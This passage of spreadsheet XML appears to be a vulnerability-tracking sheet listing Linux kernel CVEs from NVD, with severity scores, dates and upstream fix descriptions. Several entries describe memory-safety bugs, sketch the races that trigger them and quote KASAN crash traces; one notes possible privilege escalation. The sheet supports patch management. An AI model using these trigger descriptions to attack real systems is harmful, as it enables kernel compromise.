        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97576</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97577</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr"/>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: verisilicon: rockchip: reject AV1 frames exceeding the tile capacity
rockchip_vpu981_av1_dec_set_tile_info() indexes the tile group entry
array by tile1 * tile_cols + tile0, reading up to tile_cols * tile_rows
entries, lays out one descriptor per tile in the AV1_MAX_TILES tile_info
buffer, and programs the real tile_cols / tile_rows into the hardware.
The tile group entry control is a dynamic array sized to the number of
entries userspace submitted, independent of tile_cols / tile_rows, so a
frame that claims more tiles than entries reads past the array. A frame
that claims more than AV1_MAX_TILES tiles also leaves the hardware
programmed for more tiles than the descriptor buffer holds.
Reject both in prepare_run(): tile_cols * tile_rows must not exceed the
submitted entry count or AV1_MAX_TILES. The entry count is read via
v4l2_ctrl_find() (ctrl-&gt;elems). This mirrors the bound the mediatek AV1
decoder already enforces.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97577</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97578</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr"/>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: verisilicon: rockchip: guard VPU981 AV1 divisor and tile buffer
rockchip_vpu981_av1_dec_set_tile_info() divides context_update_tile_id by
tile_info-&gt;tile_cols and writes one descriptor per tile into the tile_info
DMA buffer, which holds AV1_MAX_TILES entries; tile_cols and tile_rows
come from the bitstream. Guard the division against a zero tile_cols by
initialising the context-update values to zero and computing them only
when tile_cols is non-zero, and stop the descriptor writes once the
tile_info buffer is full. The tile geometry written to the hardware
registers is left unmodified; the per-dimension and total tile bounds are
enforced by the control validation.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97578</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97579</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr"/>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: mediatek: vcodec: bound AV1 tile-start copy to the array capacity
vdec_av1_slice_setup_tile() copies tile_cols + 1 / tile_rows + 1 entries
into mi_col_starts[] / mi_row_starts[] from the bitstream tile_info. Bound
the copy to the array capacity.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97579</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97580</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr"/>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rkvdec: bound HEVC tile loops and PPS id to the array capacity
compute_tiles_uniform() and compute_tiles_non_uniform() loop over
num_tile_columns_minus1 + 1 / num_tile_rows_minus1 + 1 entries, and
assemble_hw_pps() writes one COLUMN_WIDTH / ROW_HEIGHT register per tile
and indexes priv_tbl-&gt;param_set[] by pic_parameter_set_id, all taken from
the untrusted PPS. Use the bounded v4l2_hevc_pps_num_tile_columns() /
v4l2_hevc_pps_num_tile_rows() helpers for the tile loops, and bail out of
assemble_hw_pps() before indexing priv_tbl-&gt;param_set[] with an
out-of-range pic_parameter_set_id, so the writes stay within the hardware
tables.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97580</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97584</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr"/>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Fix incorrect free in candidate cleanup in afs_lookup_server()
Fix afs_lookup_server() to not free an existing server's endpoint state
when cleaning up a candidate server.  The candidate record doesn't have an
endpoint state yet at this point, so the free for that can just be removed.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97584</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97594</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr"/>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
landlock: Fix use-after-free of the source's parent directory
current_check_refer_path() reads old_dentry-&gt;d_parent without holding a
reference nor a lock on it, and then dereferences it in
collect_domain_accesses() and in the audit record.
A reference on a child does not pin its parent: __d_move() reassigns
dentry-&gt;d_parent and drops the reference the child held on its former
parent.  hook_path_rename() is not affected because the rename path
calls lock_rename() before the hook, so the source cannot be reparented
under it.  hook_path_link() has no such protection: filename_linkat()
holds a reference on the source dentry but neither locks nor references
its parent, so a concurrent rename(2) can reparent the source while
security_path_link() runs, and the former parent can then be removed and
freed while the hook walks it.
A process can trigger this after entering a Landlock domain that handles
at least one filesystem access right.  The process can then race a
linkat(2) loop against rename(2) and rmdir(2):
  BUG: KASAN: slab-use-after-free in collect_domain_accesses+0x278/0x290
  Read of size 4 at addr ffff888160bd53f4 by task llrepro2/549
   collect_domain_accesses+0x278/0x290
   current_check_refer_path+0x952/0x1120
   security_path_link+0x1be/0x320
   filename_linkat+0x342/0x6d0
   __x64_sys_linkat+0xfa/0x150
  Freed by task 562:
   kmem_cache_free+0x139/0x4c0
   i_callback+0x4b/0x80
   rcu_core+0x7dc/0x10a0
Take a reference on the dentry selected as the source parent, using
dget() for the common-mount-root case and dget_parent() otherwise.
Release it after the hierarchy walk and synchronous audit logging.
[mic: Clarify the caller, reachability, and reference handling]</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97594</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97602</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr"/>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
inet: frags: invalidate queues before flushing them
fqdir_pre_exit() flushes the skbs from incomplete queues without
changing their completion state. A fragment which found a queue before
high_thresh was cleared can then acquire the queue lock and reuse stale
reassembly metadata. A queue concurrently killed after fqdir-&gt;dead is
set can instead become INET_FRAG_COMPLETE|INET_FRAG_HASH_DEAD while
still holding its old skbs; skipping it because it is complete leaves
those references behind until asynchronous fqdir teardown.
For IPv6, stale metadata can make ip6_frag_reasm() use the old
nhoffset with a new skb and access memory out of bounds. The resulting
heap corruption can be leveraged for local privilege escalation when
unprivileged network namespaces are available. Unflushed fragments can
also keep conntrack references alive after the conntrack per-net
cleanup point.
Kill each incomplete queue, then flush every queue still owned by the
dying rhashtable. HASH_DEAD identifies that ownership, while complete
queues without it are already owned by another destroy path and must be
left alone. Releasing a timer reference removed by inet_frag_kill() is
deferred to inet_frag_putn(), after the queue lock is dropped.
KASAN report:
  BUG: KASAN: slab-out-of-bounds in ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  Write of size 1 at addr ff110001039c6e00 by task poc/771
  Call Trace:
  ? ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:479 (discriminator 5))
  ip6_input_finish (net/ipv6/ip6_input.c:534)
  ipv6_rcv (include/net/dst.h:480 (discriminator 3) net/ipv6/ip6_input.c:119 (discriminator 3) net/ipv6/ip6_input.c:109 (discriminator 3) include/linux/netfilter.h:325 (discriminator 3) include/linux/netfilter.h:319 (discriminator 3) net/ipv6/ip6_input.c:351 (discriminator 3))
  packet_sendmsg (net/packet/af_packet.c:3110 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  The buggy address belongs to the object at ff110001039c6b40
  which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 0 bytes to the right of
  allocated 704-byte region [ff110001039c6b40, ff110001039c6e00)
  BUG: KASAN: slab-out-of-bounds in ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  Read of size 1 at addr ff110001039c6e08 by task poc/771
  Call Trace:
  ? ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  ip6_input_finish (net/ipv6/ip6_input.c:534)
  ipv6_rcv (include/net/dst.h:480 (discriminator 3) net/ipv6/ip6_input.c:119 (discriminator 3) net/ipv6/ip6_input.c:109 (discriminator 3) include/linux/netfilter.h:325 (discriminator 3) include/linux/netfilter.h:319 (discriminator 3) net/ipv6/ip6_input.c:351 (discriminator 3))
  packet_sendmsg (net/packet/af_packet.c:3110 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  packet_sendmsg (net/packet/af_packet.c:2959 net/packet/af_packet.c:3053 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  The buggy address belongs to the object at ff110001039c6b40
  which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 8 bytes to the right of
  allocated 704-byte region [ff110001039c6b40, ff110001039c6e00)</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97602</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97611</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr"/>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: openvswitch: fix use-after-free of the flow table mask array
tbl_mask_array_realloc() retires the old mask_array before it stops being
reachable:
	old = ovsl_dereference(tbl-&gt;mask_array);
	if (old) {
		...
		call_rcu(&amp;old-&gt;rcu, mask_array_rcu_cb);
	}
	rcu_assign_pointer(tbl-&gt;mask_array, new);
call_rcu() only waits for read-side critical sections already in flight.
tbl-&gt;mask_array still points at old between the call_rcu() and the
rcu_assign_pointer(), so a reader entering ovs_flow_tbl_lookup_stats() in
that window picks up old in a fresh critical section that the pending
grace period does not cover.
tbl_mask_array_realloc() runs in process context under ovs_mutex, so the
window is preemptible and can outlast the grace period. Then
mask_array_rcu_cb() frees old before the swap runs:
  BUG: KASAN: slab-use-after-free in flow_lookup.constprop.0+0x2bf/0x2f0
  Read of size 8 at addr ffff888020b3e018 by task poc/741
   flow_lookup.constprop.0+0x2bf/0x2f0
   ovs_flow_tbl_lookup_stats+0x4a3/0x5c0
   ovs_dp_process_packet+0x19c/0x710
   ovs_vport_receive+0x243/0x390
   internal_dev_xmit+0x81/0x170
  Freed by task 728:
   kfree+0x16a/0x4e0
   rcu_core+0x853/0x1030
Publish the new array before retiring the old one. The kfree_rcu() that
call_rcu() replaced ran after the swap.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97611</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97612</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin, rust</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr"/>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mpls: clear inner_protocol when the last label is popped
skb_mpls_push() records the pre-encapsulation network header once, gated
on !skb-&gt;inner_protocol. skb_mpls_pop() never clears that record, so it
outlives the encapsulation it describes.
Open vSwitch can then re-push MPLS onto a packet whose
inner_network_header still points at the older, deeper offset: push a
label, pop every label, recirculate (ovs_flow_key_update() re-derives
key-&gt;eth.type and resets network_header, but leaves inner_*), then push
again. ovs_fragment() trusts the record:
	skb-&gt;network_header = skb-&gt;inner_network_header;
so skb_network_offset() goes negative. The bound check is signed:
	if (skb_network_offset(skb) &gt; MAX_L2_LEN)
a negative offset passes it, and prepare_frag() widens the value:
	unsigned int hlen = skb_network_offset(skb);
	memcpy(&amp;data-&gt;l2_data, skb-&gt;data, hlen);
which is a ~4GiB memcpy out of a 30-byte per-CPU buffer.
Reproduced on v7.3-rc1. RDX is the truncated length, (unsigned int)(-8):
  BUG: unable to handle page fault for address: ffffe8ffffc16000
  #PF: supervisor write access in kernel mode
  Oops: 0002 [#1] SMP KASAN NOPTI
  RIP: 0010:memcpy+0x8/0x20
  RDX: 00000000fffffff8 RSI: ffff888105d732db RDI: ffffe8ffffc16000
   prepare_frag+0x3df/0x4e0
   ovs_fragment+0x589/0x7e0
   do_output+0x4ce/0x5e0
   do_execute_actions+0x55d2/0x7b30
   ovs_execute_actions+0xea/0x450
Same root-cause shape as commit 975b5b067f52 ("ipv6: sr: restore network
header before routing and forwarding"): a stale network header offset
reaching a consumer that widens it. Here it originates in the MPLS
push/pop path.
Clear inner_protocol once the packet is no longer MPLS, so a later push
re-records the current header. net/sched/act_mpls.c is the only other
skb_mpls_pop() caller and gets the same fix; sch_frag.c saves and
restores inner_protocol around fragmentation in the same way OVS does.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97612</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97903</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr"/>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
exit: hold a reference to thread_pid across proc_flush_pid
Commit 0a36bad01731 ("release_task: kill the no longer needed
get/put_pid(thread_pid)") removed the reference around proc_flush_pid().
It assumed that free_pids(post.pids) at the end of release_task() would
keep thread_pid alive until then.
That assumption is wrong.  __change_pid() only records a detached PID in
post.pids when pid_has_task() is false for every PIDTYPE.  If another task
still uses the exiting task's PID as its process group or session ID,
__unhash_process() removes the exiting task's PIDTYPE_PID link but leaves
the PID out of post.pids.  release_task() therefore holds no reference to
it after dropping tasklist_lock.
The other task can then remove the remaining PIDTYPE links.  Its
free_pids() call schedules delayed_put_pid(), and the RCU callback can free
the PID before the first release_task() reaches proc_flush_pid().
An unprivileged reproducer races wait4(-1) against setsid() to trigger this
ordering.  Three of three fresh v7.2 KASAN boots reported:
    BUG: KASAN: slab-use-after-free in
    proc_invalidate_siblings_dcache+0x3e2/0x3f0
    Read of size 8 by task h7_pid_reaper/1921
    Call Trace:
     proc_invalidate_siblings_dcache
     release_task
     wait_consider_task
     __do_wait
     do_wait
     kernel_wait4
    Freed by task 0:
     kmem_cache_free
     put_pid
     delayed_put_pid
     rcu_core
    Last potentially related work creation:
     __call_rcu_common
     free_pids
     ksys_setsid
KASAN identified a 144-byte object from the pid cache and located the bad
read 80 bytes into the freed object, matching pid-&gt;inodes.  With an
explicit reference, three of three fresh boots completed without a KASAN
report.  The concurrent RCU callback dropped its reference while
proc_flush_pid() was protected, and the balancing put_pid() performed the
final free afterward.
Take a reference before __unhash_process() clears p-&gt;thread_pid and release
it after proc_flush_pid() completes.
A tested source reproducer is available privately on request.  No
controlled read or write, information leak, or privilege escalation is
claimed.  The mainline patch applies directly to v6.19.y and newer;
v6.16.y through v6.18.y need a context-adjusted backport.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97903</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97910</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr"/>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
